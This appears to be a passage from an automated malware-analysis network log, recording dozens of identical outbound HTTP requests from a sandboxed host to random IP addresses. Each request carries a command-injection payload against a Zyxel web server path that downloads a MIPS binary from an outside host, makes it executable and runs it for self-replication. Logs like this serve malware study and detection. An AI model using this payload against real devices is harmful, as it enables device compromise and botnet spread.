                                                        Feb 2, 2024 06:20:57.677634954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1334192.168.2.1448458133.78.166.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677700043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1335192.168.2.1440360111.101.94.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677723885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1336192.168.2.14501704.101.233.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677757978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1337192.168.2.144394853.90.176.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677803993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1338192.168.2.1453048155.101.119.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677839041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1339192.168.2.1436578169.37.17.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677876949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1340192.168.2.143407247.141.31.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677911043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1341192.168.2.1454130140.19.18.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.677953005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1342192.168.2.145222017.59.254.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678006887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1343192.168.2.144507696.161.250.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678039074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1344192.168.2.1448114106.13.93.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678057909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1345192.168.2.145210640.105.182.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678112030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1346192.168.2.145978242.172.18.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678154945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1347192.168.2.1451300209.71.240.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678205013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1348192.168.2.1455004170.166.43.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678301096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1349192.168.2.144233896.241.196.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678302050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1350192.168.2.1435292116.199.240.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678337097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1351192.168.2.1446090210.241.173.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678391933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1352192.168.2.146010846.177.77.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678416967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1353192.168.2.145993047.99.11.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678468943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1354192.168.2.145844860.220.202.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678514004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1355192.168.2.1440110124.27.3.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678536892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1356192.168.2.1452748201.76.93.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678581953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1357192.168.2.1440780179.33.200.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678616047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1358192.168.2.145698698.55.95.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678662062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1359192.168.2.1436722152.215.125.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678703070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1360192.168.2.1455506153.139.27.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678735018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1361192.168.2.1449578172.214.17.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678778887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1362192.168.2.1439468149.90.68.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678812027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1363192.168.2.143431887.2.131.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678849936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1364192.168.2.1452020142.47.15.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678906918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1365192.168.2.1438890201.89.46.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678953886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1366192.168.2.144861476.91.55.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.678999901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1367192.168.2.1456512200.225.122.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679039001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1368192.168.2.1451084220.209.69.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679088116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1369192.168.2.144345668.207.249.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679105997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1370192.168.2.1432950210.152.224.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679158926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1371192.168.2.145253690.100.211.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679193974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1372192.168.2.1459028150.223.132.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679239035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1373192.168.2.1458828107.127.106.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679301023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1374192.168.2.1434764125.95.95.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679322958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1375192.168.2.1444188126.8.7.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679359913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1376192.168.2.1437406148.9.103.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679411888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1377192.168.2.144859434.202.139.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679445982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1378192.168.2.144098251.1.187.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679486990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1379192.168.2.143979887.96.241.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679532051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1380192.168.2.1456778177.255.143.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679552078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1381192.168.2.14477984.115.56.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679601908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1382192.168.2.144559885.224.194.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679651022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1383192.168.2.1449784219.152.133.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679687977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1384192.168.2.1459040184.192.94.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679728985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1385192.168.2.145474841.157.250.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679786921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1386192.168.2.144428673.65.100.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679811954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1387192.168.2.1455352202.170.197.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679840088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1388192.168.2.1452718188.45.137.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679892063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1389192.168.2.145533278.91.10.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679930925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1390192.168.2.1449094213.228.43.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.679987907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1391192.168.2.145045036.98.51.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680011034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1392192.168.2.145105646.202.151.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680046082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1393192.168.2.144274632.189.187.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680099964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1394192.168.2.1459078133.113.185.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680134058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1395192.168.2.1447538159.47.220.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:57.680198908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1396192.168.2.1447830210.242.47.230443
                                                        TimestampBytes transferredDirectionData
